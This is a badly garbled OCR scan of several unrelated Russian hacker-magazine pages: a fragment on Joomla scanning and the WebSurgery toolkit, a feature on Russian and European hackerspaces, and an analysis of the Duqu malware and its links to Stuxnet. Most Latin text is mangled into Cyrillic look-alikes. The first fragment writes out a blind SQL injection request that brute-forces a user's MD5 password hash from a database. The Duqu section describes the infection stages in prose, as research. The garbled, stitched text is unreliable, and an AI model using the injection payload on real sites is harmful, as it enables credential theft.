• определение наиболее популярныхѴѴАРдля 
Джумлы; 

• огромная встроенная база да иных для поис- 
ка уязвимостей Джумлы и ее компонентов; 

• создание отчетов в НТМІ_- итекстовом фор- 
мате; 

• автообновление сканера до последней вер- 
сии; 

• быстрая работаза счет отсутствия фаззера и 
наличия встроенной БД. 

Сканер работает в интерактивном режиме 
и имеет подробный хелп, где описаны все его 
параметры. Пример запуска: 

доотвсап.рі -и Ы:1: р://іоот1а-5І1:е.сот/ \ 
-х ргоху:рог1: 

Есть масса дополнительных опций! 



В состав ѴѴеЬ5игдегу входят: веб-краулер, про- 
грамма для брутфорса директорий и файлов, 
фаззер для продвинутой эксплуатации из- 
вестных и неизвестных уязвимостей типа 5СІІ_- 
инъекция, тестер Х55, программа для брутфорса 
форм логина, детектор ѴѴАР, детектор уязвимых 
для 0о5 мест в системе и навороченный пере- 
хватчик трафика, которым твой браузер обме- 
нивается с веб-приложениями. Чтобы проиллю- 
стрировать работу с комплексом, возьмем некий 
абстрактный РНР-скрипт ѵиіп.рбр, уязвимый для 
слепой 5(ЭІ_-инъекции. Нам необходимо достать 
из БД Му5СП_ М05-хеш пользователя. Восполь- 
зуемся встроенным фаззером. 

1. Генерируем первый запрос (ІпШаІ Редиезі): 

СЕТ /ѵиіп . рИр ?ісІ= НТТР/1.1 
Н05Т: 1.2. 3.4 

2 . С помощью встроенного л ист- генератора 
(І_І5І СопЛдигаІіоп) создаем два списка: пер- 
вый — с номерами от 1 до 32 (подлине М 05- 
хеша), а второй — с валидными символами 
для брута. 

3. Создаем финальный запрос для брута: 

СЕТ /ѵиіп . рбр?ісІ=1+апсІ+ ' ${і_іб1:_2} ' = 
бцЬбііпіп^С (5е1ес1:+ра55ыогсІ+Тгот+асІі , піп+ 
1іті1=+ 1 ^ . $ИІ5І= 1\Л) НТТР/1.1 
Н05Т : 1.2. 3.4 
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Увлеченным людям свойствен- 
но собираться вместе. Это дает 
возможность с упоением брать- 
ся за амбициозные проекты и 
справляться стакими задачами, 
которые никогда не удалось бы 
решить в одиночку. Любому чело- 
веку свойственно общаться, ве- 
селиться и обмениваться опытом. 
Нет ничего удивительного, что во 
всем мире развивается культу- 
ра хакерспейсов, где совместно 
работаютспециалисты по ИБ. И 
воттеперь, наконец, этоттренд 
добрался до России. 



Хакерспейс — территория хакеров 



КАК СОБРАТЬ 
ХАКЕРОВ В ОДНОМ 
МЕСТЕ 



ЧТО ЖЕ ТАКОЕ ХАКСПЕЙС? 



В двух словах довольно трудно объяснить неис- 
кушенномучеловеку из России, что представ- 
ляетсобойхакспейсизачем он нужен. Непросто 
даже передатьту атмосферу, которая присуща 
такогорода местам. Поэтому позвольдля начала 
провести небольшую параллель. Ты наверняка 
знаком стермином«коворкинг» — так называет- 
ся схема, когда фрилансеры снимают для работы 
общее помещение, оставаясь при этом неза- 
висимыми и свободными, эдакий хитрый способ 
выйти из социального вакуума, компенсировать 
недостатокобщения, поделиться идеями и, ко- 
нечно, по возможности, помочьдругдругу.Также 
ты наверняка помнишьосуществовании клубов 
радиолюбителей, авиамоделистов, компью- 
терные клубов — словом, обо всехтех славных 
заведениях, которые во время «нулевых» почти 
повсеместно при казал и дол го жить. Та к вот, 
хакспейсы, по сути, объединяют в себе все луч- 
шиеидеи коворкинга и старыхдобрых клубов по 
интересам, хотя ставитьхакспейсы и коворкинг 
на одну ступень и сравнивать их зачастую не 
совсемуместно. 



Итак, чтожетакоехакспейс?Наскегзрасе 
или Ьаскзрасе — место, где собираются хакеры 
со схожими интересами, чаще всего научными 
и технологическими. Нужно отметить, что под 
словом «хакеры» здесь и далее подразумева- 
ются нетолько специалисты в области ІТ. Как 
правило, пришедшиевхакспейслюди интере- 
суются цифровым или электронным искусством, 
хотятобщения и ищутединомышленников для 
совместного творчества. Они встречаются, что- 
бы получатьзнания и обмениваться ими, чтобы 
слушать или проводить презентации, лекции, 
семинары и та к дал ее. Многие компании начина- 
ют свое существование как часть ха кспейса. 

Главная особен ность любого хакспейса 
заключается втом, что там собираются очень 
разные люди с разными специализациями 
и возможностями. При ихобъединении и 
рождаются достаточно серьезные интердис- 
циплинарные проекты, например инженерно- 
художественные, дизайнерские. Арт-проекты 
сейчас вообще весьма популярные в США очень 
распространены проекты типа бо буоигзеК 
(сделай сам). Еще одно странное, но пользую- 



Хакерспейс{пеигоп} 
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СЦЕНА 




Берлинский С-Вэ5е. Космический корабль приглашает на борт! 



щееся «спросом» направление — фэшндоесть 
электроника для моды, электроника, которую 
можно носить! Хакспейсы, предоставляющие 
помещения и всю необходимую инфраструктуру 
для обеспечения посетителей едой и напитками 
и энергоснабжения, оснащены разнообразным 
оборудованием: серверами и сетевым обору- 
дованием, аудиотехникой, видеопроекторами, 
игровыми приставками и всевозможными 
инструментами и станками. Именно в этом, 
пожалуй, и состоит главное преимущество 
хакспейсов. 

Как бы ни были важны социальная состав- 
ляющая и атмосфера, и сколь бы она ни была 
прекрасна, основная фишка хакспейсов — это 
оборудование. На вооружении классических 
хакспейсов, помимо самой обычной и широ- 
коиспользуемойтехники, всегда имеются 
какие-нибудь интересные штуки: 30-принтеры, 
лазерные резаки, большие осциллографы итак 
далее. Кстати, в некоторыхзападныххакспейсах 



есть даже биологическое оборудование. Какты 
понимаешь, вышеперечисленные железки до- 
вольно проблематичнохранитьдома, да и вряд 
ли кто-тостанетихпокупать, чтобы поставить 
пару экспериментов. Они слишком тяжелы 
и велики, потребляютогромное количество 
электроэнергии и могутработатьтольковспеци- 
альных условиях, например, для лазерного 
резака обязательно нужен отсос воздуха. Ктому 
же подобные девайсы стоят порядка 30-50 тысяч 
долларов. Следует отметить, что и в хакспейсе 
редкаяжелезка стоитдешевле 1000—1 500 дол- 
ларов. Согласись, это тоже довольно ощутимые 
деньги, особенноеслиустройство нужнотебе на 
один раз или вообщетолько для ознакомления. 

Таким образом, ха кспейс — это место, куда 
можно прийти, что немаловажно, круглосуточно, 
и поработать с имеющимся там оборудованием, 
тоестьсвоегородаобщаялаборатория и клуб 
по интересам водном флаконе. Это реальное 
место, а не виртуальное сообщество, хотя вокруг 



хакспейса непременно формируется и онлайн- 
комьюнити :). 



ХАКСПЕЙСЫ В РОССИИ 



На Западе уже давно поняли, что хакспейсы — 
это действительноудобно и круто, поэтому в 
каждом более-менее крупном европейском 
городе сегодня есть хотя бы один ха кспейс, а то 
и больше. Однако, если посмотретьна мировую 
картухакспейсов, которая доступна на сайте 
Наскегзрасег.огд. можно судивлением обнару- 
жить, что Россия в этом плане пока представ- 
ляет собой больше белое пятно. 0-о-о-о-очень 
большое белое пятно. Даже в Африке хакспейсов 
больше, чему нас! Воттакой парадокс. 

«Удивительно, почему у нас до сих пор нет 
ничего подобного. Ведь менталитету наших 
людей очень подходящий, и хороших хакеров 
много», — имен но такие мысли приходят на ум, 
и именно с этих слов начали свой рассказ соз- 
датели первогороссийского хакспейса Ыеигоп 
[ пеигопзрасе.ги ). 

«Нейрон» появился в Москве около года 
назад. Фактически это второй ха кспейс в России, 
так как раньше него был создан Р055 1_аЬз в Ка- 
зани. Однако последний не является хакспейсом 
в полном смысле слова: это сугубо коммерческое 
предприятие, которое представляетсобой, 
скорее, бизнес-инкубатор. Таким образом, 
Ыеигоп можносчитатьпервымхакспейсом в 
нашей стране. Нам удалось побеседовать с 
основателями«Нейрона»: на наши вопросы 
любезно согласились ответить Алиса (еВадеІаЬ, 




Рабочая обстановка обыкновенного хакспейса 



ИЗВЕСТНЫЕХАКСПЕЙСЫ МИРА 



С-Ьазе 



І_опс1опНаск5расе(І_НС) ЫѴСКезізІог 



Сайт: ѵѵѵѵѵѵ.с-Ьа5е.огд . 

Где расположен: Германия, Берлин. 

Количество членов: 300+. 

Размер ежемесячных членских взносов: 17 евро. 



Сайт: ІопсІоп.Наск5расе.огд.ик . 

Где расположен: Великобритания, Лондон. 

Количество членов: 300+. 

Размер ежемесячных членских взносов: минимум 5 фунтов. 



Сайт: ѵѵѵѵѵѵ.пѵсге5І5Іог.сот . 

Где расположен: США, Нью-Йорк. 

Количество членов: 30+. 

Размер ежемесячных членских взносов: $75-1 15. 




Упомянутый встатьебер- 
линский С-Ьазе существует 
с 1995 года. Является одним 
из крупнейших и старей- 
ших хакспейсов в Европе. 



О СамыйбольшойхакспейсвСоеди- 
ненном Королевстве. Основан 
недавно, в 2009 году, ноуже успел 
завоевать любовь и признание 
хакеров Европы. 



Этотхакспейстакже 
упоминается встатье. 
І\ІѴС Резізіог — один из 
наиболее известных хакерспейсов в США. Суще- 
ствуете 2008 года. 



КЕНТОН 
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кофаундер), Александр (Еаіпл/аѵез, кофаундер) и 
Дмитрий (еЗаде ІаЬ). Они рассказали нам немало 
интересного. 

Идея создать ха кспейс в Росси и зароди- 
лась у ребят после посещен ия аналогичных 
мест в Европе. К примеру, Александр, один из 
кофаундеров «Нейрона», проникся этой идеей 
после посещения берлинского ССС, на который 
съезжаются хакеры со всей Европы. Сам по себе 
конгресс, конечно, неявляется,хакспейсом, 
одна ко там царитта самая атмосфера хакерского 
сообщества, о которой уже у поминал ось выше. 
ССС — это конференция, куда люди приезжают 
не просто слушать лекции, но и общаться, делать 
совместные проекты. На последнем СССбыла 
проведена презентация прохакспейсы, благо- 
даря которой Александр изагорелсяэтой идеей. 
Под впечатлением отувиден ногой услыша иного 
он принялся изучатьтему и оченьудивился, что 
хакспейсовдо пор нет в России, ведьу нас та к 
многохороших инженеров и хакеров. Алиса, в 
свою очередь, рассказала о посещении очень из- 
вестного крупного хакспейса С-Ьазе в Берлине. 
Он находится в большомздании, которое полно- 
стью стилизовано под космический корабль. 
Когда входишь внутрь, сначала струдом понима- 
ешь, куда попал. Даже поздней ночьютам кипит 
жизнь. Люди приходят в ха кспейс после работы, 
занимаются своими проектами, исследованиям, 
тусуются, что-то обсуждают, пьют... нет, не пиво 
^.Преимущественно напитки на основе мате, 
которые бодрят ничуть не хуже, чем кофе. 

Впервые создатели Ыеигоп встретились 
вянваре, чтобы познакомиться и обсудить 
объединившую их идею. Затем последовал 
довольно долгий период подготовки и поисков 
помещения. Арендовать его, удал ось только в 
июне. Так как хакспейс создавался силами всего 
четырехчеловек, обычная европейская схема 
«скинулись по чуть-чуть и арендовал и поме- 
щение»здесь,увы, не подошла. Основателям 
«Нейрона» пришлось вложить гораздо больше 
денег и стать своего рода спонсорами хакспейса. 
Однако в данном случае спонсоры не получили 
взамен ничего особенного и не преследовали 
никакой выгоды. Удастся ли команде вернуть 
инвестиции? Вряд л и. Одна ко та кой расклад 
всецел о устраивает основателей хакспейса, 
поскольку все затевалось совсем не рад и денег. 
Нообэтом мы поговоримдалее,а пока рассмо- 
трим не менее интересный вопрос — что может 
предложить первый российский хакспейс своим 
посетителям? 



КіЬегріра 

Сайт: ѵѵѵѵѵѵ.кіЬегріра.огд . 

Где расположен: Словения, Любляна. 

Количество членов: 20 активных и 40 бывших, которые 
участвуют в жизни хакспейса. 

Размер ежемесячных членских взносов: отсутствуют. 

Немного ближе к нашим 
краям. Словенский хак- 
спейс, созданный в 2001 
году, сочетает в себе лабораторию, культурный 
центр и интернет-кафе. 



Г рустная картинка, отражающая российские реалии 

«Нейрон» занимает около ста квадратных 
метров вздании на Лужнецкой набережной 
Москвы. Одно из помещений хакспейса пре- 
вращено в кухню, в скором времени планируется 
оборудоватьпереговорную и принтерную (когда 
будет собран Зй-принтер). Так как Ыеигоп был 
создан совсем недавно, он пока не можетпо- 
хвастаться изобилием оборудования, однако 
интересные штуки здесьуже есть. К примеру, 
имеется ЗоЙѵѵаге йеЛпесІ Расііо, на основе кото- 
рого можно реализовать множество различных 
систем. Сейчасоно используется для разработки 
приемника ѴѴіМ АХ и создания базовой 65М- 
станции. Какпризнался нам один из кофаунде- 
ров хакспейса, ранее он сам л ишь читал о таких 
устройствах и мог разве что мечтать о том, чтобы 
поработать сними вживую. В «Нейроне» также 
конструируютЗО-принтер. Кстати, уже сейчас 
несколько человек приходят в хакспейс как раз 
длятого, чтобы поработатьсопределенными 
устройствами. 



МеІаІаЬ 

Сайт: ѵѵѵѵѵѵ.теІаІаЬ.аІ 

Где расположен: Австрия, Вена. 

Количествочленов: 130+. 

Размер ежемесячных членских взносов: 20 евро. 

Ещеодновесьма популярноесреди 
европейскиххакеров место. Хак- 
спейс основан в 2006 году. Комьюни- 
ти МеІаІаЬ играетне последнюю 
рольвжизни города. 



В ха кспейсе регулярно проходят раз- 
личные семинары, с расписанием которых 
можноознакомиться на сайте пеигопБрасе.ги . 
Например, скоро планируется серия семина- 
ров по электронике и активно ведется поиск 
людей, которые могли бы провести семинары 
поАгбиіпо. Интересно, что семинары в«Нейро- 
не»ужесейчасдостаточно посещаемы, хотя их 
никто не рекламирует! В ха кспейсе в основ- 
ном проводятся открытыесеминары, и на них 
регулярно собирается порядка 15-1 7 человек. 
Для тех, кто подумал, что это мало, поясню: все 
приходящие люди действительно заинтересо- 
ваны темой. Поверь, лучше собрать 15 человек, 
которым семинар на самом деле нужен, чем 150, 
которые пришли поскучать. В дальнейшем для 
эксперимента планируется проводить платные 
семинары, в частности семинары, посвященные 
разл ичному железу. В целом, по мнению осно- 
вателей Меигоп,хакспейсразвивается весьма 
гармоничной в него приходит ровно столько 
людей, сколькоон может вместить. В ближай- 
шем будущем создатели оченьхотятпривлечь 
в«Нейрон»электронщиков и робототехников, 
ведьживое«железячное»комьюнити — это 
просто отлично! Здесь вообще только рады всему 
клевому и интересному, например, фаундеры 
сходу назвали та кие темы, какавиамоделирова- 
ние, создание квадрокоптеров и локпикинг(тот, 
где используются настоящие замки; это очень 
популярнаязабава наЗападе). 

Однако ха кспейсы в России не ограничива- 
ются однимтолько«Нейроном», и это просто 
замечательно! Ещеободном российскомхак- 
спейсе — НаскЗрасеЗаіпІ-РеІегзЬигд, — кото- 
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рый находится в Северной столице, нам поведал 
его кофаундер Сергей Сильное (ройкіітекау. 
сот). Уступаю ему клавиатуру, чтобы он смограс- 
сказать о своем детище сам: «Идея организовать 
хакспейс в Питере витала в воздухе как минимум 
год. Я шерстил форумы в поискахединомышлен- 
ников, ездил похакерспейсам в Европе. В итоге 
я наткнулся на двухребятиз ИТМО, которые про- 
двинул ись немного дальше в деле создания хак- 
спейса, и мы решили объединить нашиусилия. 
Чтобы при влечь максимум участи и ков в нашу ла- 



бораторию, мы сделали открытые массовым (оно 
состоялось 29 октября текущего года. — Прим. 
МіІтіІІ): семинары, конкурсы и мастер-классы 
продолжались целых два дня. Нашхакерспейс 
занимает две площадки. Первую — офисную 
комнатуплощадью40 кв. м — предоставило 
ИТМО. Оборудованиятам немного: компьютеры, 
объединенные в сеть, да несколько паяльников. 
Каждую среду в этом помещении проходятсбо- 
ры, на которыеможетприйтилюбойжелающий, 
предложитьсвой проектили присоединиться 



куже существующему. Здесьтакже регулярно 
проводятся мастер-классы и семинары. Идет 
работа над квадрокоптером, гаджетом панорам- 
ной съемки и другими устройствами. На другой 
площадке сосредоточено оборудование для 
более «тяжелых» проектов: мощный ЧПУ-шный 
30-фрезер, сварочный аппарат для алюминия, 
плазменный реза к, трубогиб, суперкомпьютер 
для рендеринга 30-графики — и устроен склад 
для л истов алюминия разной толщины. На этой 
площадке члены ха кспейса занимаются соз- 
данием электророли ков, электровелосипеда и 
супервелосипеда для скоростных рекордов». 

От себя замечу, что все адреса, явки, пароли 
и расписание мероприятий ты найдешь на сайте 
хакспейса ( Наскзрасе-зрЬ.ги ). 



НО ЭТО, НАВЕРНОЕ, ДОРОГО? 
КАК ЭТО РАБОТАЕТ? ■■ 



«Хакспейс не бывает коммерческим» — такова 
негласная «первая заповедь» большинства 
хакспейсеров всего мира. В самом начале статьи 
уже было сказано, что сравни вать ха кспейсы с 
коворкингом не совсем уместно, и теперь пора 
объяснить, почему. Какправило, коворкинг 
имеет коммерческую составляющую, в то время 
как в большинстве ха кспейсов она отсутствует 
начисто. Справедливости ради нужнозаметить, 
чтонекоторыехакспейсы созданы ради денег, 
но таких все же меньшинство. Как ни странно, 
большинствохакспейсов (и ихсоздатели) не 
преследуютникакой выгоды. Этонебизнес, в 
основном ха кспейсы организуют из любви к идее 
и кхакерскому искусству, какбы высокопарно 





При свете дня интерьеры С-Вазе, быть может, выглядятнетакфутуристично, но все равно впечатляют 
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ВІЧѴС Кевізіог кипит работа 

это ни звучало. Однако любой хакспейс, как пра- 
вило, финансируют его члены, та ким образом, он 
выводится на самоокупаемость. 

НаЗападеэтообычновыглядиттак: все 
члены ха кспейса ежемесячно скидываются по 
$50-100, чтобы оплатить аренду помещения 
(иногда, например при университетах, помеще- 
ния предоставляются бесплатно; втакихслучаях 
взнос не превышает 10-30 баксов). Деньги, 
оставшиеся после оплаты аренды, не оседают 
в чьем-нибудь карма не, а уходят на закупку 
необходимых вещей, начиная от напитков и 
заканчивая новым оборудованием. Плюстакого 
подхода заключается в том, что люди, самостоя- 
тельно оплатившие помещение, не чувствуют 
ни какого давления ни с чьей стороны. Они не 
обязаны никаким спонсорам, и никто не диктует 
им, над какими проектами нужно работать и в 
каком направлении двигаться. 

Думаю, туту многих возникли сомнения. 
Вопросы типа «а хватит л и денег?» и «будет л и 
это работать?» действительно приходят на ум. 
Приведу небольшой пример. 

В Нью-Йорке в Америке находится всемирно 
известный крупныйхакспейс — І\ІѴС Резізіог. Из 
него, кстати, выросла компания МакегВоЦ кото- 
рая н ыне производит настольные 30-принтеры. 
Вхакспейсесовсем мало постоянных чле- 
нов — всего 30 человек. Однако это осознанный 
ход. Дело в том, что фактически комьюнити 
хакспейса существенно больше — оно насчиты- 
вает несколько сотен человек. Бизнес- модель 
І\ІѴС Резізіогпроста: половина всехрасходов 
окупается за счет взносов постоянных членов, а 
другую половину организаторы набирают, про- 
водя платные семинары и сдавая в аренду ла- 
зерный резак. Кстати, основной доходхакспейса 
как раз складывается из платы за семинары по 
обучению работе на этом самом резаке. :) 

Если тебя удивило, что в крупном хакспейсе 
так мало постоянных членов, замечу, что это как 
раз нормально. Так, на последнем ССС прошла 
специальная встреча для создателей хакспейсов, 
количество членов в которых достигло 200-300 че- 



пает в роли зонтичной организации для других 
хакспейсов. Это значит, что любой хакспейс может 
статьдочерней организацией фонда, получить 
льготы (Брасе Роипсіаііоп имеет налоговые льго- 
ты, чего довольно сложно добиться на Западе), 
проконсультироваться, обратиться за помощью 
в оформлении документов, необходимые для 
существованияхакспейса, и рассчитыватьна 
всестороннюю поддержку. В России подобное, 
конечно, тоже было бы очень полезно. 

О российских реалиях мы можем рассказать 
на примере всетого же хакспейса Ыеигоп. Аренда 
помещения 1 00 кв. м в районе Воробьевых гор 
обходится в 1 20 тысяч рублей в месяц. С юриди- 
ческой точки зрения под такое начинание нужно 
создавать НКО (некоммерческую организацию), 
на которую и оформляются все документы. Сейчас 
в «Нейроне» существует два типа членства: посто- 
янное и динамическое. Постоянное членство под- 
разумевает, что у человека есть свой стол, который 
никто и никогда нетрогает. Можно спокойно при- 
ходить и работать в любое время суток. Динамиче- 
ское членство позволяет посещать хакспейс после 
работы и занимать любые доступные плоскости :). 

Постоянное членство стоит 6 тысяч рублей 
в месяц, динамическое — 2тысячи. Цифры рас- 
считаны на основе арендных ставок. На данный 
моментв Меигопужесостоятпятьили шесть 
постоянных членов и семь динамических. Не- 
сложно подсчитать, чтооснователямхакспейса 
пока приходится доплачивать разницу из своего 
кармана. Однако, какужебылосказано выше, в 
скором времени планируется начатьпроведение 
платных семинаров, а также есть идея собирать 
пожертвования на открытыхсеминарах. Мы 
уверены, что у ребят все получится и они вскоре 
выйдутна самоокупаемость. 

Ну и конечно, хотелось бы, чтобы «Нейрон» и 
НаскЗрасе-ЗРЬнестали первыми и последними 
хакспейсами в России. Надеемся, что найдутся 
и другие энтузиасты, в том числе и в других 
городах нашей огромной страны, которые по до- 
стоинству оценяти реализуютпрекрасную идею 
хакспейсов. □□ 



ловек. Дело втом, что, когда хакспейс привлекает 
так много людей, возникают вполне закономерные 
проблемы — увы, далеко не все люди способны 
уживаться друг с другом. Начинают разгораться 
конфликты (например, кто-нибудь постоянно 
мусорит, а остальных это раздражает), люди разби- 
ваются на группы и так далее и тому подобное. Эта 
встреча показала, что большинство организаторов 
хакспейсов видятлишьодно решениеэтой про- 
блемы — открывать новые отделения, создавать 
новые, более камерные группы, которые будут 
заниматься чем-то одним. 

К примеру, уже упоминавшийся С- Вазе на- 
считывает более 300 членов. В нем состоят не 
только хакеры, но и многиедругие интересные 
люди — от юристов до ученых. И у С-Ьазе уже есть 
воттакие вотменьшие подразделения. 

Но, какты понимаешь, организоватьхакспейс 
на Западе в целом гораздо проще, чем у нас. В 
Америке, к примеру, существует некоммерческая 
организация Зрасе Роипсіаііоп, которая высту- 



Библиотекавхакспейсе 
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Наверное, все слышали про подвиги Біихпеі 
в деле тонкой настройки иранской атомной 
электростанции в Бушере. Практически 
половина прошлогоднего летнего отпуска 
была проведена в ЮА в сопровождении 
различных компонентов червя Біихпеі, 
большая часть была разобрана в статике, 
а повсеместное использование ООП не 
добавляло ни грамма веселья. Прошел год... 




Рис. 1. Встречайте — легальный сертификат! 




ЖІМ32ЛШ(Ш: 
ТЕМНЫЙ ПРЕЕМНИК 
ЧЕРВЯ БТЦХЫЕТ 



□ ередина октября, спокойный хмурый осенний вечер за 
чтением Р55-ленты и бокалом односолодового виски. И 
вот среди сотен заголовков мои глаза уцепились за слово 
Біихпеі... Первая мысль — опять раздувают шумиху по поводу давнего 
инцидента. Но, пробежавшись глазами по статье в блоге Вутапіес, 
я понял, что речь идет о чем-то другом, и это «что-то» имеет впол- 
не определенное название — Оіщи. Собственно, так и начался наш 
гезеагсЬ преемника ЗіихпеС После первых сообщений о том, что Рощи 
и Зіихпеі базируются на одном исходном коде, нам захотелось разо- 
браться во всем самим, так как коллектив нашего вирлаба еще не 
забыл бессонные ночи, проведенные за реверсом Зіихпеі. =) 

После внимательного изучения доступной информации стало 
ясно, что ноги растут из венгерской исследовательской лаборатории 
СгурІодгарЬу апсі Зузіегп Зесигііу (Сгу5у5). Ее специалисты первыми обна- 
ружили Оіщи, заметили сходство этой вредоносной программы со Зіихпеі, 
провели неплохой бинарный анализ и поделились его результатами со 
специалистам из антивирусных компаний. Видимо, сотрудники Сгу5у5 
имели какое-то отношение к расследованию одного из инцидентов с 
участием Риди в Венгрии, что и объясняет их раннюю осведомленность. 
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Рис. 2. Сертификат отозван. Туда ему и дорога 



ДРОППЕР 



В самом начале истории с йиди не было информации о том, каким 
образом происходит ее установка в систему. Удалось извлечь лишь 
вредоносные компоненты, оставшиеся после заражения. Опять 
же нет никаких гарантий, что специалисты смогли найти все, по- 
скольку Риди, как и БШхпеЦ использует целый комплекс методов 
для обхода защитного ПО. 



ПРОЦЕСС УСТАНОВКИ 



Установка йиди проходит в несколько основных этапов: 

0) Запуск вредоносного вложения в виде бос-файла, который содер- 
жит код, эксплуатирующий уязвим ость нулевого дня СѴЕ-201 1-3402. 

1) Загрузка первого уровня шелл -кода в адресное пространство моду- 
ля ѵѵіп32к.5уз. 

2 ) Загрузка второго уровня шелл-кода, предназначенного для выпол- 
нения вядре. 

3) Загрузка полезной нагрузки в виде нового драйвера и его инициа- 
лизация. 

4 ) Внедрение в адресное пространство системного сервиса 
зегѵісез.ехе основного модуля установщика Рид и и его актива- 
ция. После этого происходит заражение системы. 

На уровне шелл-кода йиди местами очень напоминают БіихпеС В 

результате складывается впечатление, что это просто немного видо- 
изменённый шелл-код, заточенный под указанную уязвимость. 



ОПЯТЬ ЛЕГАЛЬНЫЕ СЕРТИФИКАТЫ 



Еще один небезынтересный момент заключается в том, что для 
компонентов йиди используются легальные цифровые подписи. На 
данный момент выявлено, что в процессе заражения устанавлива- 




Рис. 4. Программный код нашего Рис. 5. Граф потока управления 

расшифровщика Біихпеі 



ется драйвер сті4432.5у5, который отвечает за внедрение кода и 
содержит легальную цифровую подпись, принадлежащую компа- 
нии С-Мебіа Еіесігопісз Іпс. Цифровой сертификат, используемый 
для генерации подписи, был выдан ѴегіБідп со сроком действия до 
августа 2012 года (рисунок 1). В настоящее время он уже отозван и 
не является валидным. При этом имена драйверов йиди очень по- 
хожи на названия вполне легальных драйверов от производителей 
железа. Злоумышленники рассчитывали, что все это поможет как 
можно дольше скрывать факт атаки и сбить с толку специалистов 
во время криминалистической экспертизы файловой системы. 



АНАЛИЗ КОМПОНЕНТОВ 011011 



Содержимое первого набора сэмплов, который мы получили для 
анализа, представлено на рисунке 3. 

Оказалось, что часть файлов зашифрована. Это ввело нас в 
небольшой ступор, так как сэмплы были получены от коллег из 
другой антивирусной компании, у которых совершенно точно имел- 
ся расшифрованный вариант. Однако анализ одного из драйверов, 
который отвечал за внедрение других компонентов йиди в систем- 
ные процессы, позволил обнаружить код алгоритма расшифровки. 
Программный код нашего расшифровщика приведен на рисунке 4. 

При анализе кода этого драйвера выяснилось, что функционально 
он практически полностью идентичен коду драйвера, используемого 
в БШхпеС Все различия, которые мы обнаружили, были введены, 
скорее, для противодействия сигнатурному и эвристическому методу 
обнаружения вредоносного ПО. На рисунке 5 представлен граф по- 
тока управления БіихпеЦ а на рисунке 6 — Риди. Структура графов 
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Рис.З. Набор сэмплов для анализа 



УДАР ПО ЦЕЛЯМ 



Атаки были проведены в следующих странах (возможно, 
обнаружены еще не все пострадавшие): Венгрия, Франция, 
Нидерланды, Швейцария, Украина, Индия, Иран, Судан, Вьетнам. 
Следует отметить, что Иран подвергался атаке и в прошлый раз. 
Немного забегая вперед, скажу, что нам удалось подтвердить 
идентичность некоторых участков кода йиди и Біихпеі. Речь идет 
не просто об использовании отдельных идентичных функций, а об 
одинаковой платформе для разработки вредоносных программ, 
предназначенных для целенаправленных атак. В принципе, с 
высокой вероятностью за этими двумя громкими инцидентами 
могут стоять одни и те же люди или организация, разработавшая и 
Біихпеі, и Риди. 
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Рис. 8. Расшифровываем конфигурационные файлы 



и базовых блоков отчетливо показывает явное сходство этих двух 
вирусов, что опять же говорит об их преемственности. 



КАК УСТАНОВИТЬ ТОЧНУЮ ДАТУ 
ЗАРАЖЕНИЯ СИСТЕМЫ? 



Когда мы начали исследовать ѴѴіп32/Оіщи, нас сразу заинтере- 
совал вопрос, каким образом можно установить точную дату за- 
ражения компьютера этой вредоносной программой. Эта информа- 
ция, прежде всего, полезна для проведения криминалистической 
экспертизы и восстановления картины произошедших событий. 

У нас появилась идея о том, что если Оіщи хранит информацию о 
времени своего самоудаления, то должна иметься и информация о 
том, когда начинается отсчет этого времени (она может быть либо 
зашита в счетчик, либо указана в виде даты заражения). С помо- 
щью нескольких наборов сэмплов с разных зараженных машин нам 
удалось обнаружить одну интересную вещь. Оказывается, в про- 
цессе заражения формируется так называемая таіп.сІІІ (основной 
компонент Оіщи), в которой сохраняется точная дата заражения в 
ІІТС-формате. На рисунке 7 можно видеть декомпилированный код, 
осуществляющий проверку этой самой даты. 

Эти данные позволяют установить в процессе криминалистиче- 
ской экспертизы точную дату и время заражения машины. В отчете 
«Оіщи: 1Ье ргесигвог Іо Лое пехі Віихпеі» указано, что время жизни 
вируса на зараженной машине составляет 36 дней, после чего он 
автоматически удаляется. Для того чтобы узнать дату заражения, 
сначала нужно расшифровать конфигурационные файлы при по- 
мощи нехитрого самопального криптоалгоритма (рисунок 8). 

Изучив несколько наборов сэмплов, мы выяснили, что эта дата 
может меняться и, скорее всего, выставляется в процессе зара- 
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Рис. 9. Конфигурационный файл заражения 
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Рис. 10. Еще один конфигурационный файл заражения 



14.10.2011 19.10.2011 1.11.2011 3.11.2011 4.11.2011 



Лаборатория Сгу5у5 
обнародует информацию 
для сторонних 
специалистов. 



Появляется аналитический 
отчет «Оіщи: *Не ргесиг- 
5ог Іо Ліе пех* 5*ихпеІ», 
содержащий первую 
публичную информацию о 
\А/іп32/0іщи. 



Подтверждена информация 
о некоторых целях 
(точнее, о странах, где 
они находятся). Найден 
дроппер для уязвимости 
нулевого дня (СѴЕ- 
2011-3402), связанной 
с инцидентом, который 
расследуют ребята из 
Сгу5у5. 



Выходит МісгозоЛ: 5еси- 
гііу Асіѵізогу (2639658), 
который вносит ясность в 
вопрос о типе уязвимости. 
Становится ясно, что 
уязвимость кроется в 
системном компоненте 
\л/іп32к.5уз и представляет 
собой ошибку в парсере 
шрифтов ТгиеТуре. 



Распространяется 
информация с описанием 
уязвимости СѴЕ-201 1 -3402 
по программе МісгозоЛ 
АсЛѵе Рго^есЛопз Ргодгат 
(МАРР). Доступ к дропперу 
с эксплойтом имеют 
только Сгу5у5, Бутапіес и 
МісгозоЛ. Распространение 
дроппера ограничено, так 
как внутри него содержится 
информация, раскрывающая 
имена целей. 
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Рис.И.КРСвбици 

жения с учетом конфигурационных данных дроппера. Один набор 
сэмплов, который имелся в нашем распоряжении, также должен 
был удалиться через 36 дней, а вот второй — уже через 30. Конфи- 
гурационный файл, в котором указаны дата заражения 11.08.2011, 
его время 7:50:01 и период существования троянца в системе 36 
дней, представлен на рисунке 9, а конфигурационный файл с датой 
18.08.2011, временем 7:29:07 и периодом 30 дней — на рисунке 10. 



КРС-ПРОТОКОЛ ОІШІІ Ѵ5 БТІІХЫЕТ 



Особенности реализации РРС-протокола еще раз подтверждают 
сходство кода Оіщи и ЗіихпеС РРС-протокол представляет собой 
одну из самых интересных частей ЗіихпеС В Оіщи этот протокол, 
который подробно описан в нашем исследовании «Зіихпеі ипбег 
1Ье Місговсоре» (стр. 56-57), реализован не полностью. Проанали- 
зировав реализацию локальной части протокола РРС в одном из 
компонентов Оіщи и сравнив две основные процедуры в ВіпОіН, мы 
получили интересные результаты (рисунок 11). 

Код оказался практически идентичным, за исключением несу- 
щественных артефактов, которые появились после его рекомпиля- 
ции в составе Оіщи. Сам РРС имеет следующий функционал: 

• ВрсНапс11ег_1 — возвращаетустановленную версию; 

